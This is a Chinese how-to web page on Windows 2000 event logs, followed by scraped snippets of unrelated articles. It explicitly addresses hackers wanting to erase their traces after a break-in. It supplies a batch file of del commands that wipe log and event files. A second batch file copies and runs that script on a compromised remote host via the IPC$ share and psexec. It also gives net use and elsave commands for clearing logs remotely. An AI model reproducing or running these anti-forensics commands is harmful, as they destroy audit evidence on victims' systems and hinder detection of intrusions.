清除系统log的方法附批处理文件_应用技巧

什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论是网络管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。 
  一、日志文件的位置 

  Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。 

  安全日志文件:%systemroot%system32configSecEvent.EVT 

  系统日志文件:%systemroot%system32configSysEvent.EVT 

  应用程序日志文件:%systemroot%system32configAppEvent.EVT 

  有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。 

  二、清除自己电脑中的日志 

  如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。 

  三、清除远程主机上的日志 

  大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件: 

  @del c:winntsystem32logfiles*.* 

  @del c:winntsystem32config*.evt 

  @del c:winntsystem32dtclog*.* 

  @del c:winntsystem32*.log 

  @del c:winntsystem32*.txt 

  @del c:winnt*.txt 

  @del c:winnt*.log 

  @del c:del.bat 

  把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。 

  接下来再新建一个批处理文件,内容如下: 

  @copy del.bat \%1c$ 

  @echo 向肉鸡复制本机的del.bat……OK 

  @psexec \%1 c:del.bat 

  @echo 在肉鸡上运行del.bat,清除日志文件……OK 

  保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。 

  清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。 

时间: 2024-10-25 22:07:30

清除系统log的方法附批处理文件_应用技巧的相关文章

ASP实现网页打开任何类型文件都提示保存的方法附代码_应用技巧

相信大家平时都有这样的经历:页面上有一个链接指向服务器一个Word文件,当客户端机器有安装Office时,点击链接将调用Word打开浏览:当客户端机器没有安装Office时,点击链接将弹出保存对话框.总结一下即如果浏览器认识文件类型,就会自动打开:如果不认识,则会提示客户保存.可是有时候我们希望不管什么类型文件,都不要打开,直接让客户端保存.要达到这个要求,对于保存在服务器硬盘上的文件就得利用ASPUpload组件的SendBinary方法来实现,而对于保存在数据库中的文件则只须打开记录集,然后

UpdatePanel触发javascript脚本的方法附代码_应用技巧

一.预呈现数据无法更改 1.大家知道,预呈现的数据是无法更改的,以前可能提到过,这里再看demo,自定义一个控件 [DefaultProperty("Text")] [ToolboxData("<{0}:JsControl runat=server></{0}:JsControl>")] public class JsControl : WebControl { [Bindable(true)] [Category("Appeara

asp实现的可以提醒生日的几种方法附代码_应用技巧

asp生日自动提醒小程式 用ASP编写,调试通过,使用方便-asp birthday automatically remind small programs with the preparation of ASP, debug, easy to use方法一: 最初写的一个用于班级网站的最近一个月同学生日的提醒小程序.虽然不怎么样,而且很乱,但是最起码是自己动脑筋去想的,所以我比较看重.ASP程序虽然有好多可以借鉴人家的.但是我想更多时候,我们应该在经典上有所突出,有所创新那不至于默守陈规而无永

清除系统缓存的方法

  当我们在不断的使用电脑工作的的时候,常常会留下很多上网的痕迹.丢弃的图片.视频等等各种无用的通过上网留下的缓存.这些缓存占用了系统大部分的内存空间,电脑的运行的速度也越来越慢了,影响了正常的电脑工作.因此对于电脑的缓存要不断地.经常地清除,释放出多余的缓存资源.让系统更好的运行下去,下面大家就一起来看下怎样高效清除系统缓存. 高效清理系统缓存的方法: IE缓存清理方法.打开浏览器点击右上角的工具.然后点击删除的流量历史记录!然后我们把所有的勾打上.密码的还是可以留着的.点击确定即可删除IE的

GHOST使用方法图解教程_应用技巧

Windows的安装速度仍然是令人头痛的!有没有什么重装系统的简便方法呢?当然有,Ghost就是其中的一种选择. Norton Ghost的文件比较小,只要一个主文件Ghost.exe(Ghost 2002仅600多KB)就可工作,一张启动盘就可以装下.由于是纯DOS程序,建议做张启动盘并将Norton Ghost放在软盘上.我们通常把ghost文件复制到启动软盘(U盘)里,也可将其刻录进启动光盘,用启动盘进入Dos环境后,在提示符下输入ghost,回车即可运行ghost,下面,我们就一步步来看

清除系统默认共享方法揭秘_WindowsXP

自从Windows 2000操作系统开始,微软就添加了一个新的网络功能,叫做Windows默认共享.有朋友会问了,为什么叫"默认共享"呢?原来,这些文件夹与我们自己手工建立的共享文件夹之间有着一个本质的区别,在它们的共享名称最后都会有一个"$"符号,作用就是能够在网上邻居中隐藏自己.这样,除非我们预先知道这些默认共享的共享名,否则,按照常规方法是根本无法直接进入到这些文件夹的.起初这项功能主要是微软为了方便系统管理员的日常工作而设计的,并且在默认情况下它们就是开启的

iis访问出现各种问题(Vs访问正常)的部分处理方法详细整理_实用技巧

今天有园友问我一个问题,问题的大致意思就是新建了一个项目,在vs中调试都可以正常,但是在iis访问就会出现各种问题.我个人认为这个问题都很容易解决,因为园友和我离的挺远,只能通过QQ视频来操作,但是我发现这种方式的沟通确实不太方便.索性把这些问题整理一下,这样更容易的可以处理方法说明清楚. 因为我目前的项目没有这个问题存在,所以我只能是新建一个简单的项目,然后在本地操作,尽量让这个问题出现,也因为我从来没有整理过这方面额问题,现在整理一下,然后再把我遇到的一些问题整理一下,说明一下如何解决这类问

Win7系统激活新方法 用调制解调器激活的技巧

  操作方法: 一.在Win7系统上,点击"开始"按钮,然后在开始菜单上右键点击"计算机"选择"属性",打开Win7系统信息面板. 二.接着在Win7系统信息面板上,选择Win7激活窗口,然后点击"显示其它激活方法". 三.在弹出的Win7激活界面上输入Windows密钥,接着按照系统提示,点击"使用调制解调器直接连接到激活服务"进行操作即可.

.NET工厂方法模式讲解_实用技巧

工厂方法模式介绍: 工厂方法(Factory Method)模式的意义是定义一个创建产品对象的工厂接口,将实际创建工作推迟到子类当中.核心工厂类不再负责产品的创建,这样核心类成为一个抽象工厂角色,仅负责具体工厂子类必须实现的接口,这样进一步抽象化的好处是使得工厂方法模式可以使系统在不修改具体工厂角色的情况下引进新的产品. 工厂方法模式结构图: 角色分类: 抽象工厂角色:是工厂方法模式的核心,与应用程序无关.任何在模式中创建的对象的工厂类必须实现这个接口. 具体工厂角色:这是实现抽象工厂接口的具体